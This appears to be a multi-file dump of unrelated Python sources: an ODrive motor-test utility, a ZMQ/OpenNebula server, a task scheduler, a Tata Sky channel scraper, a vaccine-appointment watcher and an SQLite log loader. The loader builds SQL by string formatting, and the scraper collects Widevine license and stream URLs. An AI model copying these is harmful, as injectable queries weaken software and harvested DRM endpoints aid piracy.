from textwrap import wrap
plt.plot(self.data[:,0], self.data[:,1:])
plt.xlabel("Time (seconds)")
title = (str(inspect.getsource(self.get_var_callback))
.strip("['\\n']")
.split(" = ")[1])
plt.title("\n".join(wrap(title, 60)))
plt.legend(range(self.data.shape[1]-1))
plt.show()
def step_and_plot( axis,
step_size=100.0,
settle_time=0.5,
data_rate=500.0,
ctrl_mode=CONTROL_MODE_POSITION_CONTROL):
if ctrl_mode is CONTROL_MODE_POSITION_CONTROL:
get_var_callback = lambda :[axis.encoder.pos_estimate, axis.controller.pos_setpoint]
initial_setpoint = axis.encoder.pos_estimate
def set_setpoint(setpoint):
axis.controller.pos_setpoint = setpoint
elif ctrl_mode is CONTROL_MODE_VELOCITY_CONTROL:
get_var_callback = lambda :[axis.encoder.vel_estimate, axis.controller.vel_setpoint]
initial_setpoint = 0
def set_setpoint(setpoint):
axis.controller.vel_setpoint = setpoint
else:
print("Invalid control mode")
return
initial_settle_time = 0.5
initial_control_mode = axis.controller.config.control_mode # Set it back afterwards
print(initial_control_mode)
axis.controller.config.control_mode = ctrl_mode
axis.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL
capture = BulkCapture(get_var_callback,
data_rate=data_rate,
duration=initial_settle_time + settle_time)
set_setpoint(initial_setpoint)
time.sleep(initial_settle_time)
set_setpoint(initial_setpoint + step_size) # relative/incremental movement
capture.event.wait() # wait for Bulk Capture to be complete
axis.requested_state = AXIS_STATE_IDLE
axis.controller.config.control_mode = initial_control_mode
capture.plot()
#ERG
def run_motor_characterize_input(odrv, axs, dir):
"""
Runs configured test input for motor characterization; records time, voltage command, position, and velocity to a *.CSV in the provided directory.
Note: must be set to gimbal motor mode and current control. Make sure current_limit is set appropriately,
and be aware that this 'current limit' actually signifies the voltage limit when in gimbal motor mode.
"""
from odrive.enums import AXIS_STATE_MOTOR_CHARACTERIZE_INPUT
from datetime import datetime
start_time = datetime.now()
time_string = start_time.strftime("%m%d%Y_%H%M%S")
file_name = dir + '\\motorData' + time_string + '.csv'
if not os.path.isdir(dir):
print("Error: invalid directory")
return
timeout = 30 # [s]
buffer_size = odrv.get_motor_characterize_data_size()
vals = []
with open(file_name, "a+") as file:
file.write('%Motor characterization data\n')
file.write("%Each row's values were recorded on the same timestep\n")
file.write("%Timestep increments at 8kHz\n\n")
file.write('%Operator:\n')
file.write('%Motor:\n')
file.write('%ODrive axis: axis' + str(axs) + '\n')
file.write('%Date:,' + start_time.strftime("%d/%m/%Y") + '\n')
file.write('%Start time:,' + start_time.strftime("%H:%M:%S") + '\n\n')
file.write('%timestep (8kHz),voltage,position,velocity\n')
file.write('%[#],[V],[turns],[turns/s]\n')
file.flush()
print("Input starting...")
if axs == 0 and odrv.axis0.motor.is_calibrated:
odrv.axis0.requested_state = AXIS_STATE_MOTOR_CHARACTERIZE_INPUT
elif axs == 1 and odrv.axis1.motor.is_calibrated:
odrv.axis1.requested_state = AXIS_STATE_MOTOR_CHARACTERIZE_INPUT
else:
print("Error: invalid axis. Please choose either 0 or 1, and make sure motor is calibrated.")
return
finished = False
finish_counter = 0
while not finished:
try:
idx = odrv.get_motor_characterize_data_idx()
#ERG TODO - figure out why fetching data with idx==0 shifts all the data over a column, remove idx>0 condition
#If desired, reducing data collected (e.g. to only timestep and velocity) could get lower latency
if idx < buffer_size and idx > 0:
data = [odrv.get_motor_characterize_data_timestep(idx),
odrv.get_motor_characterize_data_voltage(idx),
odrv.get_motor_characterize_data_position(idx),
odrv.get_motor_characterize_data_velocity(idx)]
else:
data = [float("NaN"), float("NaN"), float("NaN"), float("NaN")]
finish_counter += 1
except Exception as ex:
print(str(ex))
time.sleep(1)
continue
#Record latest data (do not write yet, to optimize for speed)
vals.append(data)
#Check for end conditions (either time recorded is zero, or timeout)
if data[0] < 1:
finish_counter += 1
else:
finish_counter = 0
if finish_counter > 10:
finished = True
elapsed = (datetime.now() - start_time).seconds
if elapsed >= timeout:
print("Timeout: took more than " + str(timeout) + " seconds")
finished = True
#When finished, write all recorded data
if finished:
print("Input finished. Recording data...")
for line in vals:
str_data = map(str,line)
file.write(",".join(str_data) + ';\n')
file.flush()
print("Data saved at: " + file_name)
return
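# Hedged usage sketch (assumes an `odrv0` handle from odrive.find_any() and a
# Windows-style output directory, matching the '\\motorData' path join above):
#   run_motor_characterize_input(odrv0, 0, 'C:\\motor_logs')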
def print_drv_regs(name, motor):
"""
Dumps the current gate driver registers for the specified motor
"""
fault = motor.gate_driver.drv_fault
status_reg_1 = motor.gate_driver.status_reg_1
status_reg_2 = motor.gate_driver.status_reg_2
ctrl_reg_1 = motor.gate_driver.ctrl_reg_1
ctrl_reg_2 = motor.gate_driver.ctrl_reg_2
print(name + ": " + str(fault))
print("DRV Fault Code: " + str(fault))
print("Status Reg 1: " + str(status_reg_1) + " (" + format(status_reg_1, '#010b') + ")")
print("Status Reg 2: " + str(status_reg_2) + " (" + format(status_reg_2, '#010b') + ")")
print("Control Reg 1: " + str(ctrl_reg_1) + " (" + format(ctrl_reg_1, '#013b') + ")")
print("Control Reg 2: " + str(ctrl_reg_2) + " (" + format(ctrl_reg_2, '#09b') + ")")
def show_oscilloscope(odrv):
size = 18000
values = []
for i in range(size):
values.append(odrv.get_oscilloscope_val(i))
import matplotlib.pyplot as plt
plt.plot(values)
plt.show()
def rate_test(device):
"""
Tests how many integers per second can be transmitted
"""
# import matplotlib.pyplot as plt
# plt.ion()
print("reading 10000 values...")
numFrames = 10000
vals = []
for _ in range(numFrames):
vals.append(device.axis0.loop_counter)
loopsPerFrame = (vals[-1] - vals[0])/numFrames
loopsPerSec = (168000000/(6*3500))
FramePerSec = loopsPerSec/loopsPerFrame
print("Frames per second: " + str(FramePerSec))
# plt.plot(vals)
# plt.show(block=True)
def usb_burn_in_test(get_var_callback, cancellation_token):
"""
Starts a background thread that reads values from the USB device in a spin-loop
"""
def fetch_data():
global vals
i = 0
while not cancellation_token.is_set():
try:
get_var_callback()
i += 1
except Exception as ex:
print(str(ex))
time.sleep(1)
i = 0
continue
if i % 1000 == 0:
print("read {} values".format(i))
threading.Thread(target=fetch_data, daemon=True).start()
def yes_no_prompt(question, default=None):
if default is None:
question += " [y/n] "
elif default == True:
question += " [Y/n] "
elif default == False:
question += " [y/N] "
while True:
print(question, end='')
choice = input().lower()
if choice in {'yes', 'y'}:
return True
elif choice in {'no', 'n'}:
return False
elif choice == '' and default is not None:
return default
|
utils.py | import pathlib
import subprocess
import threading
import psutil
def git_version():
"""
Return current version of this github-repository
:return: str
"""
version_file = pathlib.Path(pathlib.Path(__file__).absolute().parent.parent, '.git', 'FETCH_HEAD')
if version_file.exists():
f = open(version_file, 'r')
version_line = f.readline().split()
version = version_line[0][:7]  # the full hash is longer, but GitHub displays only the first 7 characters
repo = version_line[-1]
return 'github version "{}" of repository {}'.format(version, repo)
else:
return ''
def metadata_string_to_dict(string):
key_value = [item.strip() for item in string.split('#')]
data = {}
for key_val in key_value:
key, value = [item.strip() for item in key_val.split(':')]
data[key] = value
return data
def metadata_dict_to_string(data):
string_list = []
for key, value in data.items():
string_list.append(f'{key}: {value}')
string = ' # '.join(string_list)
return string
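# Round-trip sketch (illustrative keys and values; note that values containing
# ':' or '#' would break the simple splits above):
#   metadata_dict_to_string({'sample': 'A1', 'run': '3'})  -> 'sample: A1 # run: 3'
#   metadata_string_to_dict('sample: A1 # run: 3')         -> {'sample': 'A1', 'run': '3'}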
def _get_running_programs():
program_list = []
for p in psutil.process_iter():
program_list.append(p.name())
return program_list
def _run_subprocess(line):
subprocess.run(line)
def run_program(program, line):
if program in _get_running_programs():
raise ChildProcessError(f'{program} is already running!')
t = threading.Thread(target=_run_subprocess, args=(line,))  # pass the callable; don't call it here
t.daemon = True # close pipe if GUI process exits
t.start()
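# Hedged usage sketch (program name and command line are illustrative):
#   run_program('notepad.exe', ['notepad.exe', 'notes.txt'])
# Raises ChildProcessError if a process named notepad.exe is already running.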
|
mtszmq.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2021 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import threading
import zmq
import json
import logging
import pyone
import logging.config
import configparser
import argparse
import base64
import random
from security.aes_cbc import *
from commands.Dispatcher import CommandsDispatcher
def args_parse():
"""
Arguments parsing:
-c [/path/to/file] - configuration file path (default - config.ini in the current directory)
"""
parser = argparse.ArgumentParser()
parser.add_argument('-c', default='config.ini')
args = parser.parse_args()
return args
def config_parser(config_file):
"""
Configuration file parsing.
Returns dictionary with configuration parameters:
'one_auth_file' - Opennebula sessions credential file path,
'key_file' - AES key file path,
'workers_quantity' - ZMQ workers quantity,
'server_ip' - IP address for ZMQ routing server binding,
'server_port' - Port number for ZMQ routing server binding,
'pidfile' - PID file path,
'vm_user' - VM user name,
'password_size' - Password size for VM users,
'password_complexity' - Password complexity for VM users (bool),
'loggerconf_file' - Logger configuration file path.
"""
config = configparser.ConfigParser()
config.read(config_file)
config_dict = {'one_auth_file': config.get('auth_file','one_auth_file'),
'key_file': config.get('auth_file','key_file'),
'workers_quantity': int(config.get('zmq_workers_quantity','workers_quantity')),
'server_ip': config.get('ip_address_port','server_ip'),
'server_port': config.get('ip_address_port','server_port'),
'pidfile': config.get('pid_file','pidfile'),
'vm_user': config.get('vm_user_name','vm_user'),
'password_size': int(config.get('password_vm_users','password_size')),
'password_complexity': config.getboolean('password_vm_users','password_complexity'),
'loggerconf_file': config.get('logger_config_file','loggerconf_file')
}
return config_dict
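# Hedged example of a matching config.ini. Section and option names are taken
# from the get() calls above; all values are illustrative:
#   [auth_file]
#   one_auth_file = /var/lib/one/.one/one_auth
#   key_file = /etc/mtszmq/aes.key
#   [zmq_workers_quantity]
#   workers_quantity = 4
#   [ip_address_port]
#   server_ip = 0.0.0.0
#   server_port = 5555
#   [pid_file]
#   pidfile = /var/run/mtszmq.pid
#   [vm_user_name]
#   vm_user = oneadmin
#   [password_vm_users]
#   password_size = 12
#   password_complexity = true
#   [logger_config_file]
#   loggerconf_file = /etc/mtszmq/logger.conf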
def session_id_generator(size = 8):
"""
Generating session id
"""
s = "0123456789ABCDEF"
return "".join(random.sample(s,size ))
def worker_routine(url_worker, key, worker_number, config_params, context=None):
"""
Worker routine
"""
logger = logging.getLogger(__name__)
AESobj = AESCipher(key)
CDobj = CommandsDispatcher(config_params)
# Getting Opennebula sessions credential
one_auth_file = open(config_params['one_auth_file'],"r")
session = one_auth_file.read().replace('\n', '')
one_auth_file.close()
one = pyone.OneServer("http://localhost:2633/RPC2", session)
context = context or zmq.Context.instance()
# Socket to talk to dispatcher
socket = context.socket(zmq.REP)
socket.connect(url_worker)
logger.info(("Worker %s started") % worker_number)
while True:
json_receive = AESobj.decrypt(socket.recv())
session_id = session_id_generator()
if json_receive:
logger.info(("Worker %s received session ID: %s") % (worker_number, session_id))
json_reply = json.dumps(CDobj.command_switcher(json_receive, session_id, one, config_params))
socket.send(AESobj.encrypt(json_reply))
else:
logger.info(("Session ID: %s. Worker %s received a message with an unsupported encryption method. ") % (session_id, worker_number))
json_reply = json.dumps({"error": "unsupported encryption method"})
socket.send(json_reply.encode())  # zmq sockets require bytes, not str
def main(config_params):
"""
Routing server
"""
# Getting AES key
key_file = open(config_params['key_file'],"r")
key = base64.b64decode(key_file.read())
key_file.close()
# Configuration for logging
logging.config.fileConfig(fname=config_params['loggerconf_file'], disable_existing_loggers=False)
logger = logging.getLogger(__name__)
logger.info("Routing server started")
url_worker = "inproc://workers"
url_client = "tcp://" + config_params['server_ip'] + ":" + config_params['server_port']
# Prepare our context and sockets
context = zmq.Context.instance()
# Socket to talk to clients
clients = context.socket(zmq.ROUTER)
clients.bind(url_client)
# Socket to talk to workers
workers = context.socket(zmq.DEALER)
workers.bind(url_worker)
# Launch pool of worker threads
for worker_number in range(config_params['workers_quantity']):
thread = threading.Thread(target=worker_routine, args=(url_worker, key, worker_number, config_params))
thread.start()
zmq.proxy(clients, workers)
# We never get here but clean up anyhow
clients.close()
workers.close()
context.term()
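# --- Hedged client sketch (not part of the original module) ---
# Minimal illustration of how a client could talk to the routing server above:
# one REQ socket paired with the ROUTER front-end, the same shared AES key,
# one JSON request/reply. The "ping" payload is purely illustrative; real
# commands are whatever CommandsDispatcher.command_switcher() accepts, and
# AESCipher is assumed to behave as in worker_routine above.
def example_client(server_ip, server_port, key):
    """Send one encrypted JSON command and print the decrypted reply."""
    aes = AESCipher(key)
    context = zmq.Context.instance()
    socket = context.socket(zmq.REQ)
    socket.connect("tcp://" + server_ip + ":" + server_port)
    socket.send(aes.encrypt(json.dumps({"command": "ping"})))
    reply = aes.decrypt(socket.recv())
    print(reply)
    socket.close()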
if __name__ == "__main__":
config_params = config_parser(args_parse().c)
pid = str(os.getpid())
with open(config_params['pidfile'], 'w') as pid_file:  # file() no longer exists in Python 3
    pid_file.write(pid)
main(config_params)
|
scheduler.py | import sys
import traceback
if sys.version_info[0] < 3:
    import Queue as queue  # the module is named Queue in Python 2
else:
    import queue
import threading
from yaku.task_manager \
import \
run_task, order_tasks, TaskManager
from yaku.utils \
import \
get_exception
import yaku.errors
def run_tasks(ctx, tasks=None):
if tasks is None:
tasks = ctx.tasks
task_manager = TaskManager(tasks)
s = SerialRunner(ctx, task_manager)
s.start()
s.run()
def run_tasks_parallel(ctx, tasks=None, maxjobs=1):
if tasks is None:
tasks = ctx.tasks
task_manager = TaskManager(tasks)
r = ParallelRunner(ctx, task_manager, maxjobs)
r.start()
r.run()
class SerialRunner(object):
def __init__(self, ctx, task_manager):
self.ctx = ctx
self.task_manager = task_manager
def start(self):
# Dummy to give same interface as ParallelRunner
pass
def run(self):
grp = self.task_manager.next_set()
while grp:
for task in grp:
run_task(self.ctx, task)
grp = self.task_manager.next_set()
class ParallelRunner(object):
def __init__(self, ctx, task_manager, maxjobs=1):
self.njobs = maxjobs
self.task_manager = task_manager
self.ctx = ctx
self.worker_queue = queue.Queue()
self.error_out = queue.Queue()
self.failure_lock = threading.Lock()
self.stop = False
def start(self):
def _worker():
# XXX: this whole thing is a hack - find a better way to
# notify task execution failure to all worker threads
while not self.stop:
task = self.worker_queue.get()
try:
run_task(self.ctx, task)
except yaku.errors.TaskRunFailure:
e = get_exception()
self.failure_lock.acquire()
self.stop = True
self.failure_lock.release()
task.error_msg = e.explain
task.error_cmd = e.cmd
self.error_out.put(task)
except Exception:
e = get_exception()
exc_type, exc_value, tb = sys.exc_info()
lines = traceback.format_exception(exc_type, exc_value, tb)
self.failure_lock.acquire()
self.stop = True
self.failure_lock.release()
task.error_msg = "".join(lines)
task.error_cmd = []
self.error_out.put(task)
self.worker_queue.task_done()
for i in range(self.njobs):
t = threading.Thread(target=_worker)
t.setDaemon(True)
t.start()
def run(self):
grp = self.task_manager.next_set()
while grp:
for task in grp:
self.worker_queue.put(task)
# XXX: we only join once we detect the worker queue to be empty, to
# avoid blocking for a long time. This is naive, and will break if
# the worker_queue is filled after this point
while not self.stop:
if self.worker_queue.empty():
self.worker_queue.join()
break
if not self.error_out.empty():
task = self.error_out.get()
msg = task.error_msg
cmd = task.error_cmd
raise yaku.errors.TaskRunFailure(cmd, msg)
grp = self.task_manager.next_set()
|
allChannels.py | ### Script to get all channels from tata sky
import threading
API_BASE_URL = "https://kong-tatasky.videoready.tv/"
import requests
import json as json
channel_list = []
def getChannelInfo(channelId):
url = API_BASE_URL + "content-detail/pub/api/v1/channels/" + channelId
x = requests.get(url)
channel_meta = x.json()['data']['meta'][0]
channel_detail_dict = x.json()['data']['detail']
onechannl = {
"channel_id": str(channelId),
"channel_name": channel_meta['channelName'],
"channel_license_url": channel_detail_dict['dashWidewineLicenseUrl'],
"channel_url": channel_detail_dict['dashWidewinePlayUrl'],
"channel_entitlements": channel_detail_dict['entitlements'],
"channel_logo": channel_meta['channelLogo'],
}
channel_list.append(onechannl)
def saveChannelsToFile():
print(len(channel_list))
with open("allchannels.json", "w") as channel_list_file:
json.dump(channel_list, channel_list_file)
def processChunks(channel_lists):
for channel in channel_lists:
print("Getting channelId:" ,channel['id'])
channel_id = str(channel['id'])
getChannelInfo(channel_id)
def getAllChannels():
    ts = []
    url = API_BASE_URL + "content-detail/pub/api/v1/channels?limit=443"
    x = requests.get(url)
    # use a local name so we don't shadow the global channel_list accumulator
    channels = x.json()['data']['list']
    print("Total Channels fetched:", len(channels))
    print("Fetching channel info..........")
    for i in range(0, len(channels), 5):
        t = threading.Thread(target=processChunks, args=(channels[i:i + 5],))
        ts.append(t)
        t.start()
    for t in ts:
        t.join()
    print("Saving all to a file.... " + str(len(channel_list)))
    saveChannelsToFile()
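# Hedged alternative sketch (not in the original script): the manual 5-item
# chunking above can also be written with a thread pool, which bounds
# concurrency without slicing the list by hand.
def getAllChannelsPooled(workers=5):
    from concurrent.futures import ThreadPoolExecutor
    url = API_BASE_URL + "content-detail/pub/api/v1/channels?limit=443"
    channels = requests.get(url).json()['data']['list']
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # list() forces evaluation so worker exceptions surface here
        list(pool.map(lambda c: getChannelInfo(str(c['id'])), channels))
    saveChannelsToFile()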
if __name__ == '__main__':
getAllChannels()
|
watcher.py | import sys
import time
import json
import elemental
import threading
import requests
from seleniumwire import webdriver
from subprocess import check_output
from dataclasses import dataclass
from datetime import datetime
import argparse
import gc
from . import get_logger
logger = get_logger()
_watcher_lock = threading.Lock()
_watcher = None
def run_command(cmd):
out = check_output(cmd, shell=True)
if isinstance(out, bytes):
out = out.decode('utf8')
return out.strip()
def create_timestamp():
return datetime.now().strftime('%m-%d-%Y %H:%M:%S')
class Browser:
def __init__(self):
self.chrome_options = webdriver.ChromeOptions()
self.chrome_options.add_argument("--disable-gpu")
self.chrome_options.add_argument("--disable-software-rasterizer")
self.chrome_options.add_argument("--headless")
self.chrome_options.add_argument("--disable-dev-shm-usage")
self.chrome_options.add_argument("--window-size=1920x1080")
self.chrome_options.add_argument("--disable-setuid-sandbox")
self.chrome_options.add_argument("--no-sandbox")
self.selenium_wire_options = {
'exclude_hosts': ['google-analytics.com', 'facebook.com', 'youtube.com', 'adservice.google.com', 'insight.adsrvr.org']
}
self.exec_path = run_command('which chromedriver')
self._driver = None
self._browser = None
self._calls = 0
def should_reset(self):
if self._calls > 10:
self._reset()
self._calls = 0
self._calls += 1
def _reset(self):
self._create_driver()
self._create_browser()
def _create_driver(self):
if self._driver:
self.close()
self._driver = webdriver.Chrome(options=self.chrome_options, seleniumwire_options=self.selenium_wire_options, executable_path=self.exec_path)
def _create_browser(self):
if self._browser:
return
if not self._driver:
self._create_driver()
self._browser = elemental.Browser(self._driver)
@property
def driver(self):
if not self._driver:
self._create_driver()
return self._driver
@property
def browser(self):
if not self._browser:
self._create_browser()
return self._browser
    def close(self):
        # guard against a second close() after the driver is already gone
        if self._driver:
            self._driver.close()
            self._driver.quit()
        self._driver = None
        self._browser = None
        gc.collect()
@dataclass
class Config:
city: str = 'Houston'
state: str = 'Texas'
state_abbr: str = 'TX'
zipcode: str = '77056'
_wg_steps = [
'https://www.walgreens.com/',
'https://www.walgreens.com/findcare/vaccination/covid-19?ban=covid_scheduler_brandstory_main_March2021',
]
_avail_links = {
'cvs': 'https://www.cvs.com/immunizations/covid-19-vaccine?icid=cvs-home-hero1-link2-coronavirus-vaccine',
'wg': 'https://www.walgreens.com/findcare/vaccination/covid-19?ban=covid_scheduler_brandstory_main_March2021'
}
class VaccineWatcher:
def __init__(self, config, freq_secs=600, hook=None, check_walgreens=True, check_cvs=True, send_data=True, always_send=False, verbose=False):
self.config = Config(**config)
self.freq = freq_secs
self.send_data = send_data
self.always_send = always_send
self.hook = hook
self.verbose = verbose
self._last_status = {'walgreens': {'available': False, 'data': None, 'timestamp': None}, 'cvs': {'available': False, 'data': None, 'timestamp': None}}
self._check_wg = check_walgreens
self._check_cvs = check_cvs
self.api = Browser()
self.browser = self.api.browser
self.alive = True
self.dactive = False
logger.log(f'Initialized VaccineWatcher with {self.config}. Will Check every {self.freq} secs. Walgreens: {self._check_wg}. CVS: {self._check_cvs}\nCall .run() to start daemon')
def _wg_parser(self, resp):
data = json.loads(resp.body.decode('utf-8'))
self._last_status['walgreens']['data'] = data
        if data.get('appointmentsAvailable'):
msg = f'Walgreens has Available Appointments: {data["availabilityGroups"]} for Next {data["days"]} in {data["zipCode"]}, {data["stateCode"]} in {data["radius"]} mile radius'
msg += f'\nPlease Visit: {_avail_links["wg"]} to schedule.'
self._call_hook(msg)
logger.log(msg)
return True
if self.verbose:
msg = f'Result for Walgreens: {data}'
logger.log(msg)
return False
def check_wg(self):
self.browser.visit(_wg_steps[0])
time.sleep(5)
self.browser.visit(_wg_steps[1])
time.sleep(5)
self.browser.get_element(partial_link_text="Schedule new appointment").click()
time.sleep(3)
self.browser.get_input(id="inputLocation").fill(f'{self.config.city} {self.config.state} {self.config.zipcode}')
self.browser.get_button(text="Search").click()
time.sleep(1)
reqs = self.browser.selenium_webdriver.requests
for r in reqs:
if r.response:
if '/hcschedulersvc/svc/v1/immunizationLocations/availability' in r.url:
return self._wg_parser(r.response)
return None
def _cvs_parser(self, resp):
data = json.loads(resp.body.decode('utf-8'))['responsePayloadData']['data'][self.config.state_abbr]
for item in data:
if item['city'] == self.config.city.upper():
self._last_status['cvs']['data'] = item
if item['status'] == 'Available':
msg = f'CVS has Available Appointments in {item["city"]}, {item["state"]}'
msg += f'\nPlease Visit: {_avail_links["cvs"]} to schedule.'
self._call_hook(msg)
logger.log(msg)
return True
if self.verbose:
msg = f'Results for CVS: {item}'
logger.log(msg)
return False
def check_cvs(self):
self.browser.visit('https://www.cvs.com/')
time.sleep(1)
self.browser.get_element(partial_link_text="Check vaccine availability").click()
self.browser.get_element(partial_link_text=self.config.state).click()
reqs = self.browser.selenium_webdriver.requests
for r in reqs:
if r.response:
if 'https://www.cvs.com/immunizations/covid-19-vaccine.vaccine-status' in r.url:
return self._cvs_parser(r.response)
return None
def run(self):
if not self.dactive:
t = threading.Thread(target=self._daemon, daemon=True)
t.start()
def last_check(self):
return self._last_status
def _call_hook(self, msg=None):
if not self.hook:
return
if not msg and not self.send_data:
return
if msg and self.send_data:
self.hook(message=msg, data=self.last_check())
elif msg:
self.hook(message=msg)
        elif self.always_send:
self.hook(message=None, data=self.last_check())
def _daemon(self):
self.dactive = True
        logger.log('Vaccine Watcher Active')
while self.alive:
if self._check_cvs:
self._last_status['cvs']['available'] = self.check_cvs()
self._last_status['cvs']['timestamp'] = create_timestamp()
if self._check_wg:
self._last_status['walgreens']['available'] = self.check_wg()
self._last_status['walgreens']['timestamp'] = create_timestamp()
self._call_hook()
self.api.should_reset()
time.sleep(self.freq)
def __call__(self, check_walgreens=True, check_cvs=True):
res = {}
if check_walgreens:
res['walgreens'] = self.check_wg()
if check_cvs:
res['cvs'] = self.check_cvs()
return res
def __enter__(self):
return self
def close(self):
self.alive = False
        self.api.close()
msg = 'Vaccine Watcher is exiting'
self._call_hook(msg)
logger.log(msg)
def __exit__(self, *_):
self.close()
def configure_watcher(**config):
global _watcher
with _watcher_lock:
if _watcher:
return
_watcher = VaccineWatcher(**config)
def get_vaccine_watcher(**config):
configure_watcher(**config)
return _watcher
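# Hedged usage sketch (mirrors the CLI below; all values are placeholders):
def _example_watcher():
    params = {'city': 'Houston', 'state': 'Texas', 'state_abbr': 'TX', 'zipcode': '77056'}
    watcher = get_vaccine_watcher(config=params, freq_secs=600)
    watcher.run()                # starts the background daemon thread
    return watcher.last_check()  # latest availability snapshot per pharmacy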
class ZapierWebhook:
def __init__(self, url):
self.url = url
self.s = requests.Session()
logger.log(f'Initialized Zapier Webhook at {self.url}')
def __call__(self, message=None, data=None):
        if not message and not data:
return
params = {}
if message:
params['message'] = message
if data:
params.update(data)
params['timestamp'] = create_timestamp()
r = self.s.post(self.url, json=params)
if r.status_code == 200:
logger.log(f'Successfully sent to Zapier Webhook: {params}')
else:
            logger.log(f'Potential Error sending to Zapier Webhook: HTTP {r.status_code}')
def cli():
parser = argparse.ArgumentParser(description='Vaccine Watcher CLI')
parser.add_argument('--city', dest='city', type=str, default="Houston", help='Full name of your City.')
parser.add_argument('--state', dest='state', type=str, default="Texas", help='Full name of your State.')
parser.add_argument('--abbr', dest='state_abbr', type=str, default="TX", help='State Abbreviation')
parser.add_argument('--zip', dest='zipcode', type=str, default="77056", help='Your nearest Zipcode')
parser.add_argument('--freq', dest='freq', type=int, default=600, help='Seconds between refreshes')
parser.add_argument('--zapier', dest='zapierhook', type=str, default=None, help='A Zapier Webhook URL to Send Messages/Notifications')
parser.add_argument('--no-cvs', dest='cvs', default=True, action='store_false', help='Disable CVS Search.')
parser.add_argument('--no-wg', dest='wg', default=True, action='store_false', help='Disable Walgreens Search.')
parser.add_argument('--verbose', dest='verbose', default=False, action='store_true', help='Enable verbosity. Will log results regardless of status')
args = parser.parse_args()
params = {'city': args.city.capitalize(), 'state': args.state.capitalize(), 'state_abbr': args.state_abbr.upper(), 'zipcode': args.zipcode}
hook = None
if args.zapierhook:
hook = ZapierWebhook(args.zapierhook)
watcher = get_vaccine_watcher(config=params, freq_secs=args.freq, hook=hook, check_walgreens=args.wg, check_cvs=args.cvs, verbose=args.verbose)
watcher.run()
while True:
try:
time.sleep(60)
except KeyboardInterrupt:
            logger.log('Exiting due to Keyboard Interrupt')
watcher.close()
sys.exit()
except Exception as e:
watcher.close()
            logger.log(f'Exiting Due to Error: {str(e)}')
sys.exit()
if __name__ == '__main__':
cli()
|
dataPre.py | import sqlite3
import os
import datetime
import threading, queue
import math
import time
class DataPre():
def __init__(self, filepath, setpath):
self.filepath = filepath
self.setpath = setpath
setName = os.path.basename(filepath)
self.setName = setName.split('.')[0]
self.tableName = 'DataPre'
self.connection = sqlite3.connect(\
os.path.join(self.setpath, self.setName+'.db'))
#self.connection = pymysql.connect("localhost", "root", "jeskkyf5", "test")
self.cursor = self.connection.cursor()
path = os.path.join(self.setpath, self.setName)
if not os.path.exists(path):
os.mkdir(path)
self.st_msg = (True, None)
self.lock = threading.Lock()
def add_msg(self, msg):
if self.st_msg[0]:
self.st_msg = (False, msg)
def execute_set(self, demand):
#connection = sqlite3.connect('%s/%s.db' % (self.setpath, self.setName))
#cursor = connection.cursor()
#cursor.execute(demand)
#connection.commit()
#connection.close()
#data = cursor.fetchall()
self.cursor.execute(demand)
self.connection.commit()
data = self.cursor.fetchall()
return data
def create_table(self):
dm = '''CREATE TABLE %s
(
id integer NOT NULL PRIMARY KEY AUTOINCREMENT,
Dates date NULL ,
Timing time NULL ,
user varchar(50) NULL ,
IP varchar(20) NULL ,
state varchar(10) NULL
);''' % self.tableName
try:
self.execute_set(dm)
except Exception as e:
self.add_msg(str(e))
def insert_table(self, Dates, Timing, user, IP, state):
dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
VALUES('%s', '%s', '%s', '%s', '%s');''' \
% (self.tableName, Dates, Timing, user, IP, state)
try:
self.execute_set(dm)
except Exception as e:
self.add_msg(str(e))
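    def insert_table_params(self, Dates, Timing, user, IP, state):
        # Hedged sketch (not part of the original class): sqlite3 qmark
        # placeholders avoid the quoting problems that the 'BAD NAME' guard
        # in get_checks below works around.
        dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
        VALUES(?, ?, ?, ?, ?);''' % self.tableName
        try:
            self.cursor.execute(dm, (Dates, Timing, user, IP, state))
            self.connection.commit()
        except Exception as e:
            self.add_msg(str(e))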
def insert_table_all(self, tups):
for tup in tups:
dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
VALUES('%s', '%s', '%s', '%s', '%s');''' \
% (self.tableName, tup[0], tup[1], tup[2], tup[3], tup[4])
try:
self.cursor.execute(dm)
except Exception as e:
self.add_msg(str(e))
try:
self.connection.commit()
except Exception as e:
self.add_msg(str(e))
def insert_table_queue(self, tup_queue):
while True:
tup = tup_queue.get()
dm = '''INSERT INTO %s(Dates, Timing, user, IP, state)
VALUES('%s', '%s', '%s', '%s', '%s');''' \
% (self.tableName, tup[0], tup[1], tup[2], tup[3], tup[4])
self.cursor.execute(dm)
tup_queue.task_done()
def insert_lines(self, lines):
for line in lines:
tup = self.check_line(line)
if tup is None:
continue
self.insert_table(*tup)
def estab_table2(self):
print(time.ctime())
line_queue = queue.Queue()
tups = []
for n in range(10):
check_thread = threading.Thread(target=self.check_line_queue, args=(line_queue, tups,))
            check_thread.daemon = True
check_thread.start()
with open(self.filepath, 'rt') as f:
for line in f:
line_queue.put(line)
#tup = self.check_line(line)
#if tup is None:
# continue
#else:
# tups.append(tup)
line_queue.join()
print(time.ctime())
self.insert_table_all(tups)
#self.connection.commit()
print(time.ctime())
def estab_table(self):
self.create_table()
tups = []
with open(self.filepath, 'rt') as f:
for line in f:
tup = self.check_line(line)
if tup is None:
continue
else:
tups.append(tup)
self.insert_table_all(tups)
    def get_time(self, ls):
        # use a local name that does not shadow the imported time module
        ts = [str(datetime.datetime.now().year)]
        ts.extend(ls)
        ts = ' '.join(ts)
        ts = datetime.datetime.strptime(ts, '%Y %b %d %H:%M:%S')
        ts = datetime.datetime.strftime(ts, '%Y-%m-%d %H:%M:%S')
        return ts.split(' ')
def get_checks(self, line):
checks = line.split(' ')
if '' in checks:
checks.remove('')
Dates, Timing = self.get_time(checks[0:3])
i = checks.index('from')
IP = checks[i+1]
user = checks[i-1]
while '"' in user or "'" in user or '[' in user or ']' in user:
user = 'BAD NAME'
return Dates, Timing, IP, user
